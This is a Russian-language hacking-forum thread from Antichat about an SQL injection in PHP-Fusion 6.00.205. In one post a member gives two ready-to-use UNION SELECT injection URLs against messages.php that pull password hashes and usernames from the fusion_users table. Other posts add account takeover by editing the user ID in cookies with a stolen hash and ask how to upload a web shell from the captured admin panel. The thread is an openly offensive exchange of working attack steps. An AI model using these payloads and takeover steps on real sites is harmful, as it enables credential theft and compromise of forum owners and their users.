HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

php-fusion 6.00.205 sql-injection
  #1  
Старый 27.11.2005, 23:31
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
С нами: 10943066

Репутация: 1236


По умолчанию php-fusion 6.00.205 sql-injection

Прежде всего спасибо ZaCo (xaxa3217) - sql нашел именно он!))) а сайт - я))) . По мере того как линки будут умирать (webfile.ru)) я добавлю новые. Кстати ZaCo гдето запостил сам sql запрос. вот. поэтому не буду повторять. Итак видео щас тут: webfile.ru/657729
__________________


snow white world wide
 
Ответить с цитированием

  #2  
Старый 28.11.2005, 00:05
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

выложи сплойт
 
Ответить с цитированием

  #3  
Старый 28.11.2005, 00:10
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
С нами: 10875266

Репутация: -12
По умолчанию

смори грин мишка создавал тему непомню как называеться
 
Ответить с цитированием

  #4  
Старый 28.11.2005, 00:12
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
С нами: 10943066

Репутация: 1236


По умолчанию

мд5 хэши
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

имена
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_name,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

надо быть залогиненным
__________________


snow white world wide
 
Ответить с цитированием

  #5  
Старый 28.11.2005, 14:57
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

Достаточно было взять хешку и подредактировать куки.. даже имя пользователя знать не надо, просто в куках меняеш айди. эт я про видео.
 
Ответить с цитированием

  #6  
Старый 07.12.2005, 00:47
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
С нами: 10789409

Репутация: 4
По умолчанию

А шелл, как в него залить из админки?
 
Ответить с цитированием

  #7  
Старый 23.12.2005, 16:44
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
С нами: 10943066

Репутация: 1236


По умолчанию

шелл я не заливал, но попробуй качнуть к примеру из полученной админки
__________________


snow white world wide
 
Ответить с цитированием

  #8  
Старый 12.05.2008, 18:33
Blacksmith
Новичок
Регистрация: 30.03.2008
Сообщений: 12
С нами: 9534083

Репутация: 1
По умолчанию

Есть подобный скуль для версии PHP-Fusion 6.01.3.01 ?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.